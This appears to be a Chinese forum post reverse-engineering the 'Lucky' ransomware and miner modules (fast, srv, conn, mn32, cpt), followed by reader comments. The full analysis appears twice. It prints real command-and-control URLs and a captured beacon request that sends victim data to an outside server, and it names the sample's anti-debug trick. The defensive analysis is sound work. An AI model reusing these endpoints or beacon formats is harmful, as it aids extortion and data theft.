Lucky 勒索病毒流程分析
本帖最后由 1行 于 2020-4-17 10:25 编辑# Lucky 勒索病毒流程分析
`fast`模块,主要功能是下载`coon`模块和`srv`模块。
`srv`模块,主要功能是联网持续更新`srv`模块,并将其设置为服务自启动。
`mn32`模块,主要功能是挖矿,找到了矿池地址。
`cpt`模块,主要功能是加密特定后缀的文件,并排除特定的文件夹,加密后的格式为 `.系统标识.原文件名.lucky`,并弹出勒索信息。
# fast.exe
## PEID 分析
使用PEID分析,发现加壳了,所以需要脱壳。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/e8345fc8-ed05-470a-ac27-98457c77cf81.png)
脱壳后分析。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/70683c2a-1203-4d6d-b8a6-8fff7b5f59f2.png)
### 沙箱分析
使用沙箱分析发现,恶意程序会从特定的网址上下载其它的恶意程序,再使用命令行打开恶意程序。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/2a905619-5738-4501-bbca-a5897dbfd2f0.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/55a2baa6-b480-4ecf-b4b6-9ab588329f7d.png)
### IDA分析
在主函数中发现这些函数,猜测是下载数据到本地的操作。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/1146290d-55bf-4bc3-8cfb-84cf89aa73e4.png)
分析 sub_401000 函数,发现这个函数的作用是从网站上下载数据拷贝到文件中。而 srv.exe 猜测是与服务有关的程序。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/423fd8d9-4457-45b8-8ffe-d40883e202f2.png)
那么 fast.exe 程序的主要作用是从网站上下载 conn.exe 和 srv.exe。继续分析这两个文件的作用。
# srv.exe
## PEID 分析
使用PEID分析,发现加壳了,所以需要脱壳。分析发现TLS回调函数中有反调试,可以使用 load PE 将TLS表中的所有内容全部清空来过掉反调试。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/4e9555ee-7a41-4c38-a1cf-9a5aa4108a01.png)
脱壳后。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/7dabba8c-f2ba-4184-a2a7-16702e682324.png)
## 沙箱分析
使用沙箱分析发现,恶意程序会从特定的网址上更新自身,并且以创建服务的方式自启动。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/9669895b-879c-4f50-8a9d-9e77db640cc6.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/2e1e8b50-6683-40af-bea2-30ad5294ef98.png)
## IDA 分析
### sub_404810
经过分析发现 sub_404810 函数时主要函数,那么开始分析其内部的操作。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/f50f48be-165c-4f96-97a3-353d094bb154.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/6b0dccd4-f964-43cc-bceb-6518c54a79e3.png)
#### sub_403B2B
这个函数的基本逻辑是,首先拼接得到网址的字符串,访问网址来获取数据。如果获取的数据不对,则再到另外的网址去获取。如果获取的数据时正确的,则
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/61bf6ef7-184a-4a7d-bd5d-8aadb7d1d7fb.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/22441e97-d475-4d9c-8a24-2b89b84bbdf1.png)
首先分析 sub_4A9C10 函数,发现其返回的是一个部分网址字符串的指针。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/c915c831-1f9c-4f39-8c27-c3151633286e.png)
分析 sub_4A9AFC 函数,发现返回了保存有 http://111.90.158.225/wversion 这个字符串的地址。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/c6ed7499-e8fa-43bf-9002-5b4cc8f55e92.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/0ea5c341-ca4f-4a16-954c-4d558a0fe791.png)
分析 sub_403039 函数,发现其基本操作是先初始化应用程序,再打开一个网址,最后从网址上下载数据。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/4ac245ec-f289-44f4-82e1-38e1985a5ad1.png)
如果数据正确,那么就会进入 sub_40383D 函数,那么就开始分析这个函数。分析发现基本逻辑是,拼接字符串,从网址上下载数据拷贝到文件中,关闭服务,将恶意程序更新,再开启服务。所以这个函数的目的是更新恶意程序。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/37854193-e7d0-4a52-8208-a21137a35ed1.png)
#### sub_404810 的一些其它函数
继续分析 sub_404810 的其它函数,发现是下载其它恶意程序。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/02402ea1-e617-41c0-9d11-e0a01e4b7db6.png)
#### sub_401FE2
跟踪 sub_401FE2 函数,发现它是将自身设置为服务,并启动服务。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/87540256-27b9-4214-99a3-68104c32f823.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/f41838c7-eb2d-4eb8-bd4f-0096dc3661c5.png)
#### StrAddress
发现了这个函数,是删除下载的恶意代码,然后再上传计算机的版本信息。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/2f725ac5-1ab2-4984-ade7-7c44567e9dcb.png)
分析 sub_404183 函数,发现是先获取计算机的版本信息,拼接到一起 再上传。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/a6fdefc6-93ec-49b3-8127-6bd89157947c.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/18126622-cad8-41a1-b580-0a0941e959fe.png)
# conn.exe
## PEID 分析
使用PEID分析,发现是VS2015编写的程序。并且加壳了,所以需要脱壳。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/c484fd20-2ea5-4ff1-8cfd-209a6364258a.png)
脱壳后再使用PEID分析。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/82ab5ec7-6ae8-4f35-a627-197358a77cdd.png)
使用了很多加密算法。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/9b6ba126-8b0e-40d1-bcc2-d8d3c3ed5bb4.png)
观察它的输入表函数,发现有与网络连接相关的函数,
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/6ba0bcff-a445-4f00-b8dd-4666f65d60a8.png)
## 使用微步云沙箱分析
脱壳后进行使用微步云沙箱分析,会发现它释放了文件,对网络有所操作。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/265a8ba1-3118-4466-bf5a-eee15a43211b.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/111b51db-c4ff-48ae-8417-7557da7b3166.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/3c65f6c7-06d2-4e43-8ba4-1ee1f90d09c8.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/a899ebd6-4c59-4907-97c6-e9afce3d9962.png)
会导致计算机内存不足
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/e2e7bc79-87f4-4303-8cca-2db16dadec6a.png)
虚拟机直接蓝屏了
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/ca1ec738-4b46-42ee-8f57-45e579507d7c.png)
## 火绒剑分析
执行分析,blue.exe,star.exe
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/de53710a-3b60-457c-9a9f-bd5633819b13.png)
文件分析,将dll写入到恶意程序,blue.exe,star.exe,mmke.exe中,
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/d76b8451-7593-4a34-9078-7b47eaa9ce47.png)
注册表项分析
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/cccb06f1-ead0-4a50-8ce9-d5022a6113e4.png)
进程分析,设置消息钩子。先创建mmkt.exe进程。可以看到 blue.exe 进程加载了主程序释放出来的 dll 文件。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/1de2c33e-a5fc-4ba3-8f48-e51a3a4a424f.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/5748dc7e-bf43-4e62-87af-a2cf3c554526.png)
网络连接,blue.exe和star.exe发送数据包,病毒主程序进行网络连接。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/3b095793-b16b-42c5-9dce-72df472aa8de.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/b45ef463-f825-4331-bc5f-192c6191f9ef.png)
行为监控,从主程序中释放了exe及dll。可以发现,启动行为都是通过命令行来完成的。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/d2a928fd-784f-4f62-bb63-40837437c403.png)
注册表快照比较
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/20f6354a-e546-4c85-a3d7-68081ffcd4af.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/937eeb52-ec26-4c44-9597-2a46b53ce0d4.png)
## IDA 分析
找到几个关键的函数,开始分析
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/8c54e2c0-7654-4dff-b79d-b96000fbfc6e.png)
分析 loc_416FF0 函数,发现它创建了 blue.exe 等病毒文件。然后判断计算机系统是32位还是64位,再创建 mmkt.exe 并运行。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/2c713de1-af94-4954-a5ae-77d3676eca83.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/ecd79ec0-01df-420b-a9c3-e676e50f99cd.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/1ebc1524-cfd2-41f6-9807-14fdf6214bae.png)
#### 分析 mmkt.exe
# mn32.exe
## PEID 分析
使用PEID分析发现是 UPX 压缩壳。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/27068dd5-1a5f-40be-8b74-a8b6bb812385.png)
脱壳后分析,是 Delphi程序,并且有加密算法。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/84247a72-078a-42eb-8480-0881abd234e9.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/b5303608-3939-4b8d-863b-47a183cbcf71.png)
## 使用微步云沙箱分析
分析发现,恶意代码可能是个挖矿模块。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/4cb4cb58-c0c0-4e80-88e8-8cd5cea1134e.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/eb186d47-7c41-4138-adc0-4bbf55f52129.png)
## IDA和OD分析
找到矿池地址。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/5b945305-1a57-4c0a-961e-6872634ca4c8.png)
# cpt.exe
## PEID 分析
发现有upx壳,脱壳后分析。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/26405b35-282b-4170-978f-52d047b01000.png)
脱壳后分析发现,在其导入表中有关于服务的函数,猜测行为可能与服务有关。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/98aae382-74ab-4f2b-b5e3-7c4d7de581c7.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/8ec87bb7-dc7a-43b0-b7d1-c940e7b7fe67.png)
## 使用 IDA和OD 分析
### sub_405764
分析发现了恶意代码的主要行为函数 sub_405764,分析此函数
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/c16a7a78-8e07-4357-8795-e7b6c9a70e63.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/c8b94def-ca56-49cc-9a88-2f54e8c85f6b.png)
#### sub_4027E0
创建互斥体,保证只有一个恶意代码进程在系统中运行
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/13b22af6-f5ba-4769-ad9a-ea14cd1e6490.png)
#### sub_40374C
分析发现一段长字符串,可能是生成长度为199字节加密密钥的字符串。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/b7324d04-aa74-4ae8-b8e7-6b466a025944.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/adf96a0e-d82c-4228-8d30-3cfbbf469130.png)
#### sub_4055D2
生成了40位的字符串,并存入C:\Windows\Temp\Ssession文件中
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/9c9efc63-1181-4900-85e3-759fca75f8cf.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/cf04b272-d8ed-408d-ab6d-67c951b7ebda.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/d16a2e47-eba3-4aff-8b35-210856f42141.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/e31c5149-0d5b-41e7-ba11-7af3b932de9f.png)
#### sub_40471A
发现了这样的字符串。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/80b0bf4a-7a99-4ca1-91a9-580fc8e6abdf.png)
#### sub_404EE6
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/d4f38815-ecb8-4e3f-b377-40926d915b10.png)
分析 sub_401A5E 函数,发现其确定了需要加密文件的后缀。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/3195f8ef-f8d2-45b2-8e33-7af2190432de.png)
分析 sub_4040C3 函数,发现遍历文件夹,并且加密时排除这些文件夹。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/9c96fb6c-d773-4a5b-9ed3-82f4ba8153b2.png)
分析发现,加密是将 放到原始文件名的前面,.youLOLY0got9v1Sh4kQS2SgLGQVE4Z8MkqCgnzNi放到后面,最后在加上.lucky后缀。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/1e15e30f-7844-4128-9bd5-050862ee2220.png)
#### sub_4028A8
将获取到的信息拼接到一起,通过 Charles 抓包分析,发送给服务器一段数据`GET http://111.90.158.224/cyt.php?code=dimagYreesVnMMqT87mWj6SDJvGxrwXBhDx1j4dO&file=0&size=0&sys=win&VERSION=4.6&status=done HTTP/1.1`
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/57dff648-1140-454f-94ab-9264725aab89.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/8d4d9cad-ff51-4562-b147-9ca8274f1b50.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/f588828e-c099-427c-9be4-1f94c3dbdf8a.png)
#### 勒索信息
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/e2729d22-c7f8-49b0-9bdc-2a5b9b2ea146.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/3deed8e0-4798-4720-ba11-8757e405a20d.png)
# Lucky 勒索病毒流程分析
`fast`模块,主要功能是下载`coon`模块和`srv`模块。
`srv`模块,主要功能是联网持续更新`srv`模块,并将其设置为服务自启动。
`mn32`模块,主要功能是挖矿,找到了矿池地址。
`cpt`模块,主要功能是加密特定后缀的文件,并排除特定的文件夹,加密后的格式为 `.系统标识.原文件名.lucky`,并弹出勒索信息。
# fast.exe
## PEID 分析
使用PEID分析,发现加壳了,所以需要脱壳。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/e8345fc8-ed05-470a-ac27-98457c77cf81.png)
脱壳后分析。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/70683c2a-1203-4d6d-b8a6-8fff7b5f59f2.png)
### 沙箱分析
使用沙箱分析发现,恶意程序会从特定的网址上下载其它的恶意程序,再使用命令行打开恶意程序。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/2a905619-5738-4501-bbca-a5897dbfd2f0.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/55a2baa6-b480-4ecf-b4b6-9ab588329f7d.png)
### IDA分析
在主函数中发现这些函数,猜测是下载数据到本地的操作。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/1146290d-55bf-4bc3-8cfb-84cf89aa73e4.png)
分析 sub_401000 函数,发现这个函数的作用是从网站上下载数据拷贝到文件中。而 srv.exe 猜测是与服务有关的程序。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/423fd8d9-4457-45b8-8ffe-d40883e202f2.png)
那么 fast.exe 程序的主要作用是从网站上下载 conn.exe 和 srv.exe。继续分析这两个文件的作用。
# srv.exe
## PEID 分析
使用PEID分析,发现加壳了,所以需要脱壳。分析发现TLS回调函数中有反调试,可以使用 load PE 将TLS表中的所有内容全部清空来过掉反调试。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/4e9555ee-7a41-4c38-a1cf-9a5aa4108a01.png)
脱壳后。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/7dabba8c-f2ba-4184-a2a7-16702e682324.png)
## 沙箱分析
使用沙箱分析发现,恶意程序会从特定的网址上更新自身,并且以创建服务的方式自启动。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/9669895b-879c-4f50-8a9d-9e77db640cc6.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/2e1e8b50-6683-40af-bea2-30ad5294ef98.png)
## IDA 分析
### sub_404810
经过分析发现 sub_404810 函数时主要函数,那么开始分析其内部的操作。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/f50f48be-165c-4f96-97a3-353d094bb154.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/6b0dccd4-f964-43cc-bceb-6518c54a79e3.png)
#### sub_403B2B
这个函数的基本逻辑是,首先拼接得到网址的字符串,访问网址来获取数据。如果获取的数据不对,则再到另外的网址去获取。如果获取的数据时正确的,则
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/61bf6ef7-184a-4a7d-bd5d-8aadb7d1d7fb.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/22441e97-d475-4d9c-8a24-2b89b84bbdf1.png)
首先分析 sub_4A9C10 函数,发现其返回的是一个部分网址字符串的指针。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/c915c831-1f9c-4f39-8c27-c3151633286e.png)
分析 sub_4A9AFC 函数,发现返回了保存有 http://111.90.158.225/wversion 这个字符串的地址。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/c6ed7499-e8fa-43bf-9002-5b4cc8f55e92.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/0ea5c341-ca4f-4a16-954c-4d558a0fe791.png)
分析 sub_403039 函数,发现其基本操作是先初始化应用程序,再打开一个网址,最后从网址上下载数据。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/4ac245ec-f289-44f4-82e1-38e1985a5ad1.png)
如果数据正确,那么就会进入 sub_40383D 函数,那么就开始分析这个函数。分析发现基本逻辑是,拼接字符串,从网址上下载数据拷贝到文件中,关闭服务,将恶意程序更新,再开启服务。所以这个函数的目的是更新恶意程序。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/37854193-e7d0-4a52-8208-a21137a35ed1.png)
#### sub_404810 的一些其它函数
继续分析 sub_404810 的其它函数,发现是下载其它恶意程序。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/02402ea1-e617-41c0-9d11-e0a01e4b7db6.png)
#### sub_401FE2
跟踪 sub_401FE2 函数,发现它是将自身设置为服务,并启动服务。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/87540256-27b9-4214-99a3-68104c32f823.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/f41838c7-eb2d-4eb8-bd4f-0096dc3661c5.png)
#### StrAddress
发现了这个函数,是删除下载的恶意代码,然后再上传计算机的版本信息。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/2f725ac5-1ab2-4984-ade7-7c44567e9dcb.png)
分析 sub_404183 函数,发现是先获取计算机的版本信息,拼接到一起 再上传。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/a6fdefc6-93ec-49b3-8127-6bd89157947c.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/18126622-cad8-41a1-b580-0a0941e959fe.png)
# conn.exe
## PEID 分析
使用PEID分析,发现是VS2015编写的程序。并且加壳了,所以需要脱壳。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/c484fd20-2ea5-4ff1-8cfd-209a6364258a.png)
脱壳后再使用PEID分析。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/82ab5ec7-6ae8-4f35-a627-197358a77cdd.png)
使用了很多加密算法。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/9b6ba126-8b0e-40d1-bcc2-d8d3c3ed5bb4.png)
观察它的输入表函数,发现有与网络连接相关的函数,
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/6ba0bcff-a445-4f00-b8dd-4666f65d60a8.png)
## 使用微步云沙箱分析
脱壳后进行使用微步云沙箱分析,会发现它释放了文件,对网络有所操作。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/265a8ba1-3118-4466-bf5a-eee15a43211b.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/111b51db-c4ff-48ae-8417-7557da7b3166.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/3c65f6c7-06d2-4e43-8ba4-1ee1f90d09c8.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/a899ebd6-4c59-4907-97c6-e9afce3d9962.png)
会导致计算机内存不足
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/e2e7bc79-87f4-4303-8cca-2db16dadec6a.png)
虚拟机直接蓝屏了
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/ca1ec738-4b46-42ee-8f57-45e579507d7c.png)
## 火绒剑分析
执行分析,blue.exe,star.exe
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/de53710a-3b60-457c-9a9f-bd5633819b13.png)
文件分析,将dll写入到恶意程序,blue.exe,star.exe,mmke.exe中,
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/d76b8451-7593-4a34-9078-7b47eaa9ce47.png)
注册表项分析
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/cccb06f1-ead0-4a50-8ce9-d5022a6113e4.png)
进程分析,设置消息钩子。先创建mmkt.exe进程。可以看到 blue.exe 进程加载了主程序释放出来的 dll 文件。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/1de2c33e-a5fc-4ba3-8f48-e51a3a4a424f.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/5748dc7e-bf43-4e62-87af-a2cf3c554526.png)
网络连接,blue.exe和star.exe发送数据包,病毒主程序进行网络连接。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/3b095793-b16b-42c5-9dce-72df472aa8de.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/b45ef463-f825-4331-bc5f-192c6191f9ef.png)
行为监控,从主程序中释放了exe及dll。可以发现,启动行为都是通过命令行来完成的。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/d2a928fd-784f-4f62-bb63-40837437c403.png)
注册表快照比较
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/20f6354a-e546-4c85-a3d7-68081ffcd4af.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/937eeb52-ec26-4c44-9597-2a46b53ce0d4.png)
## IDA 分析
找到几个关键的函数,开始分析
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/8c54e2c0-7654-4dff-b79d-b96000fbfc6e.png)
分析 loc_416FF0 函数,发现它创建了 blue.exe 等病毒文件。然后判断计算机系统是32位还是64位,再创建 mmkt.exe 并运行。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/2c713de1-af94-4954-a5ae-77d3676eca83.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/ecd79ec0-01df-420b-a9c3-e676e50f99cd.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/1ebc1524-cfd2-41f6-9807-14fdf6214bae.png)
#### 分析 mmkt.exe
# mn32.exe
## PEID 分析
使用PEID分析发现是 UPX 压缩壳。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/27068dd5-1a5f-40be-8b74-a8b6bb812385.png)
脱壳后分析,是 Delphi程序,并且有加密算法。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/84247a72-078a-42eb-8480-0881abd234e9.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/b5303608-3939-4b8d-863b-47a183cbcf71.png)
## 使用微步云沙箱分析
分析发现,恶意代码可能是个挖矿模块。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/4cb4cb58-c0c0-4e80-88e8-8cd5cea1134e.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/eb186d47-7c41-4138-adc0-4bbf55f52129.png)
## IDA和OD分析
找到矿池地址。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/5b945305-1a57-4c0a-961e-6872634ca4c8.png)
# cpt.exe
## PEID 分析
发现有upx壳,脱壳后分析。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/26405b35-282b-4170-978f-52d047b01000.png)
脱壳后分析发现,在其导入表中有关于服务的函数,猜测行为可能与服务有关。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/98aae382-74ab-4f2b-b5e3-7c4d7de581c7.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/8ec87bb7-dc7a-43b0-b7d1-c940e7b7fe67.png)
## 使用 IDA和OD 分析
### sub_405764
分析发现了恶意代码的主要行为函数 sub_405764,分析此函数
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/c16a7a78-8e07-4357-8795-e7b6c9a70e63.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/c8b94def-ca56-49cc-9a88-2f54e8c85f6b.png)
#### sub_4027E0
创建互斥体,保证只有一个恶意代码进程在系统中运行
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/13b22af6-f5ba-4769-ad9a-ea14cd1e6490.png)
#### sub_40374C
分析发现一段长字符串,可能是生成长度为199字节加密密钥的字符串。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/b7324d04-aa74-4ae8-b8e7-6b466a025944.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/adf96a0e-d82c-4228-8d30-3cfbbf469130.png)
#### sub_4055D2
生成了40位的字符串,并存入C:\Windows\Temp\Ssession文件中
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/9c9efc63-1181-4900-85e3-759fca75f8cf.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/cf04b272-d8ed-408d-ab6d-67c951b7ebda.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/d16a2e47-eba3-4aff-8b35-210856f42141.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/e31c5149-0d5b-41e7-ba11-7af3b932de9f.png)
#### sub_40471A
发现了这样的字符串。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/80b0bf4a-7a99-4ca1-91a9-580fc8e6abdf.png)
#### sub_404EE6
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/d4f38815-ecb8-4e3f-b377-40926d915b10.png)
分析 sub_401A5E 函数,发现其确定了需要加密文件的后缀。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/3195f8ef-f8d2-45b2-8e33-7af2190432de.png)
分析 sub_4040C3 函数,发现遍历文件夹,并且加密时排除这些文件夹。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/9c96fb6c-d773-4a5b-9ed3-82f4ba8153b2.png)
分析发现,加密是将 放到原始文件名的前面,.youLOLY0got9v1Sh4kQS2SgLGQVE4Z8MkqCgnzNi放到后面,最后在加上.lucky后缀。
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/1e15e30f-7844-4128-9bd5-050862ee2220.png)
#### sub_4028A8
将获取到的信息拼接到一起,通过 Charles 抓包分析,发送给服务器一段数据`GET http://111.90.158.224/cyt.php?code=dimagYreesVnMMqT87mWj6SDJvGxrwXBhDx1j4dO&file=0&size=0&sys=win&VERSION=4.6&status=done HTTP/1.1`
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/57dff648-1140-454f-94ab-9264725aab89.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/8d4d9cad-ff51-4562-b147-9ca8274f1b50.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/f588828e-c099-427c-9be4-1f94c3dbdf8a.png)
#### 勒索信息
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/e2729d22-c7f8-49b0-9bdc-2a5b9b2ea146.png)
![](https://raw.githubusercontent.com/liang23wen/picture/master/img/3deed8e0-4798-4720-ba11-8757e405a20d.png) 平繁 发表于 2020-4-2 17:19
额,我从上到下看了一下,是不是有点重复的啊(单纯看着一致,如果确实有细微差距我能力弱看不出来的,请无 ...
同感,重要的东西都被混一起了。 额,我从上到下看了一下,是不是有点重复的啊(单纯看着一致,如果确实有细微差距我能力弱看不出来的,请无视) 好详细。 膜拜大神 楼主用心了 感谢分享 提供给相关安全部门,雷霆出手,一举成功。 大佬牛皮 膜拜大佬,懵逼中 虽然看不懂,还是觉得国内有这样的大神在,挺厉害的。
页:
[1]
2